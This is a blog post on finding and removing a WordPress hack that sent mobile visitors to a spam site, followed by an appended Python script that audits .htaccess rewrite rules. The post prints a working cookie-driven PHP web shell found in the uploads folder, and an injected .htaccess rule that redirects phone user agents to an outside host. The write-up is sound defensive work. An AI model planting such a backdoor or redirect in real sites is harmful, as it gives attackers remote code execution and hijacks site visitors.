
Category: Software

Fixing a WordPress Redirect Hack

So I got a frantic call from my BFF who said, Daniel, your Science Fiction novels are so good. Can you help me fix my website? This BFF obviously knows how to preface a question, so I agreed to take a look. What I found was both confusing and arousing, and after fixing it, I said to myself, Daniel, your Science Fiction novels are so good, but you're never going to remember how to fix this. That brings us to this blog post, wherein I tell you how to stop your WordPress website from redirecting to a shitty spam site, specifically when accessed via a mobile device.

The fact that the redirect only happens on mobile devices was quite interesting, but trying to investigate on an iPhone is pretty much impossible. Luckily, Chrome has you covered. Just hit F12 to open Developer Tools, and toggle the device toolbar (CTRL-SHIFT-M). Then you can trick the website into thinking you're an iPhone and trigger the redirect. I did just that, tried to look at the network events, JavaScript debugger, etc., but found nothing! The redirect was taking me to a .bid site, so I grepped for that word in the WordPress install but didn't find it there either. A quick Google search turned up a lot of advice about looking for encoded PHP in the theme files, but they were all clean.

Then I turned my attention to the uploads folder. I found this file and couldn't figure out what it did.

```
daniel@bffserver [~]# cat psvkwrmv.php.fart
<?php $oewzo=$_COOKIE; $ycke=$oewzo[zutc]; if($ycke){ $ojaf=$ycke($oewzo[yzda]);$gpjc=$ycke($oewzo[kvyi]);$fyup=$ojaf("",$gpjc);$fyup();
```

I ran it through the hex, base64, and PHP decoders but nothing came up, so I renamed it to a harmless .fart file and moved it out of the uploads directory. Then I found the culprit!
Here are the contents of the .htaccess file in the uploads directory:

```apache
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge\ |maemo|midp|mmp|mobile.+firefox|netfront|opera\ m(ob|in)i|palm(\ os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows\ ce|xda|xiino [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a\ wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r\ |s\ )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1\ u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp(\ i|ip)|hs\-c|ht(c(\-|\ |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac(\ |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(\ |\/)|klon|kpt\ |kwc\-|kyo(c|k)|le(no|xi)|lg(\ g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-|\ |o|v)|zz)|mt(50|p1|v\ )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v\ )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-|\ )|webc|whit|wi(g\ |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-) [NC]
RewriteRule ^$ http://luxurytds.com/go.php?sid=1 [R,L]
```

You son of a bitch .htaccess file! Sadly, whatever made those edits also touched the .htaccess files in a bunch of other directories, including the root .htaccess file that should look like this:

```apache
dverast@dougherty:~/danielverastiqui.com$ cat .htaccess
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
```

If you need to find all the affected .htaccess files quickly, you can use grep:

```
daniel@bffserver [~]# grep -lR "luxurytds.com" .
grep: ./access-logs: No such file or directory
./www/blog/backup-1408304576-wp-admin/.htaccess
./www/blog/backup-1408304576-wp-includes/.htaccess
./www/blog/backup-1500088171-wp-admin/.htaccess
./www/blog/backup-1500088171-wp-includes/.htaccess
./www/blog/wp-content/backup-1500088171-themes/.htaccess
./www/blog/wp-content/backup-1408304576-themes/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/cherry-lazy-load/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/motopress-content-editor/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/cherry-bgslider-plugin/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/.htaccess
./www/blog/wp-content/backup-1408304576-plugins/.htaccess
./www/cgi-bin/.htaccess
./public_html/blog/backup-1408304576-wp-admin/.htaccess
./public_html/blog/backup-1408304576-wp-includes/.htaccess
./public_html/blog/backup-1500088171-wp-admin/.htaccess
./public_html/blog/backup-1500088171-wp-includes/.htaccess
./public_html/blog/wp-content/backup-1500088171-themes/.htaccess
./public_html/blog/wp-content/backup-1408304576-themes/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/cherry-lazy-load/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/motopress-content-editor/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/cherry-bgslider-plugin/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/.htaccess
./public_html/blog/wp-content/backup-1408304576-plugins/.htaccess
./public_html/cgi-bin/.htaccess
```

After I deleted every .htaccess file and replaced them with the defaults or recommended versions, the site stopped redirecting. Success! However: I still don't know exactly how the .htaccess files were being invoked. I mean, I kinda do, but in a much more real way, I have no idea. Would be interested to know for sure…
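An added example, not from the post: a Python audit for .htaccess files that parses the Rewrite directives, flags conditions keyed on HTTP_USER_AGENT and RewriteRules that send visitors to a host you do not own, and evaluates the conditions the way mod_rewrite does (consecutive [OR] conditions form one group, every group must match, NC makes the match case-insensitive). It also shows why only phones saw the redirect: Apache reads the .htaccess of every directory along the request path wherever AllowOverride permits, the root file carried the same rule, and in per-directory context the pattern ^$ matches a request for the directory itself, so a mobile user agent loading the homepage got a 302 (the default for [R]) to the spam site while desktop browsers matched neither condition. The two sample files are constructed; the injected one has its user-agent alternation trimmed to a few entries, the two user-agent strings are constructed, and the allowed host is the site's own domain from the post.

```python
"""Audit .htaccess rewrite rules and evaluate UA conditions (added example, constructed samples)."""
from __future__ import annotations
import re
from urllib.parse import urlsplit

# The block WordPress itself writes into the root .htaccess.
WP_DEFAULT = r"""# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
"""

# Constructed copy of the injected file, user-agent alternation shortened.
INJECTED = r"""RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android|blackberry|ip(hone|od)|mobile.+firefox|opera\ m(ob|in)i|windows\ ce [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|nok(6|i)|sgh\-|vodafone) [NC]
RewriteRule ^$ http://luxurytds.com/go.php?sid=1 [R,L]
"""

REWRITE_LINE = re.compile(r"^\s*(RewriteCond|RewriteRule)\s+(\S+)\s+(.+?)(?:\s+\[([^\]]*)\])?\s*$")


def parse_rewrites(text: str) -> list[tuple[str, str, str, list[str]]]:
    """Return (directive, test-or-pattern, pattern-or-target, flags) for each Rewrite line."""
    rules = []
    for line in text.splitlines():
        m = REWRITE_LINE.match(line)
        if m:
            flags = [f.strip().upper() for f in (m.group(4) or "").split(",") if f.strip()]
            rules.append((m.group(1), m.group(2), m.group(3), flags))
    return rules


def audit_htaccess(text: str, allowed_hosts: set[str]) -> list[str]:
    """Findings worth a human look: UA-keyed conditions and redirects to hosts you do not own."""
    findings = []
    for directive, test, arg, flags in parse_rewrites(text):
        if directive == "RewriteCond" and "HTTP_USER_AGENT" in test.upper():
            findings.append(f"user-agent condition: {arg[:40]}")
        elif directive == "RewriteRule" and "://" in arg:
            host = (urlsplit(arg).hostname or "").lower()
            if host not in allowed_hosts:
                findings.append(f"redirect to external host {host} [{','.join(flags)}]")
    return findings


def cond_matches(test: str, pattern: str, flags: list[str], user_agent: str) -> bool:
    """Evaluate one RewriteCond; only HTTP_USER_AGENT is modelled, other tests are assumed true."""
    if "HTTP_USER_AGENT" not in test.upper():
        return True
    return re.search(pattern, user_agent, re.I if "NC" in flags else 0) is not None


def conds_pass(conds: list, user_agent: str) -> bool:
    """mod_rewrite semantics: a run of [OR] conditions is one group; every group must match."""
    i = 0
    while i < len(conds):
        group_ok, in_group = False, True
        while in_group and i < len(conds):
            test, pattern, flags = conds[i]
            group_ok = group_ok or cond_matches(test, pattern, flags, user_agent)
            in_group = "OR" in flags
            i += 1
        if not group_ok:
            return False
    return True


def redirect_target(text: str, user_agent: str, request_path: str = "") -> str | None:
    """External URL a request (the site root by default) with this UA is sent to, or None."""
    conds: list = []
    for directive, a, b, flags in parse_rewrites(text):
        if directive == "RewriteCond":
            conds.append((a, b, flags))
            continue
        rule_conds, conds = conds, []   # conditions only apply to the rule that follows them
        if re.search(a, request_path) and "R" in flags and "://" in b and conds_pass(rule_conds, user_agent):
            return b
    return None


# Constructed user-agent strings for the two cases the post describes.
IPHONE = "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 Mobile/15A372 Safari/604.1"
DESKTOP = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0 Safari/537.36"

if __name__ == "__main__":
    print(audit_htaccess(INJECTED, {"danielverastiqui.com"}))
    print(redirect_target(INJECTED, IPHONE), redirect_target(INJECTED, DESKTOP))
```

Feed `audit_htaccess` the contents of every .htaccess in the tree (the post's `grep -lR` only finds files that mention the one domain you already know about; a rule pointing anywhere off-site is the thing to look for). A file that audits clean and whose rewrite block matches `WP_DEFAULT` is one you can leave alone; everything else gets replaced, backups and plugin directories included, since a single surviving copy brings the redirect back.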

© 2018 Daniel Verastiqui